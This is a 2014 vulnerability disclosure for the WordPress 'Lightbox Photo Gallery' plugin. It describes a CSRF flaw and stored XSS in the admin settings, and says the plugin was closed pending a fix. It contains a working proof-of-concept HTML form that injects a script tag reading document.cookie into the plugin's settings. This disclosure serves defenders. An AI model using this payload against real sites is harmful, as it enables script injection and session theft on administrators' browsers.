Title: WordPress 'Lightbox Photo Gallery' plugin - CSRF/XSS Version: 1.0 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/lightbox-photo-gallery/ Notified WordPress: 2014/11/27 ---------------------------------------------------------------- ## Description: ---------------------------------------------------------------- Lighbox Photo Gallery will help you quickly and easily create an appealing photo gallery that opens in a lightbox. Use the settings page to select the images you want in your gallery and add the shortcode [ll-gallery] to the page or post where you want the gallery to show ## CSRF: ---------------------------------------------------------------- It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ---------------------------------------------------------------- Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin and then submit the following form. <form method="POST" action="http://[DOMAIN]/wp-admin/admin-ajax.php"> <input type="text" name="action" value="ll_save_settings"><br /> <input type="text" name="ll__opt[image2_url]" value="http://www.smartcatdesign.net/wp-content/uploads/demo_banner.png"><script>alert(document.cookie);</script>"><br /> <input type="text" name="ll__opt[image3_url]" value="http://www.smartcatdesign.net/wp-content/uploads/demo_banner.png"><script>alert(document.cookie);</script>"><br /> <input type="text" name="ll__opt[background_color]" value="#ffffff"><br /> <input type="text" name="ll__opt[disable]" value="1"><br /> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- No fix available. WordPress has been notified and the plugin has been closed until it is updated.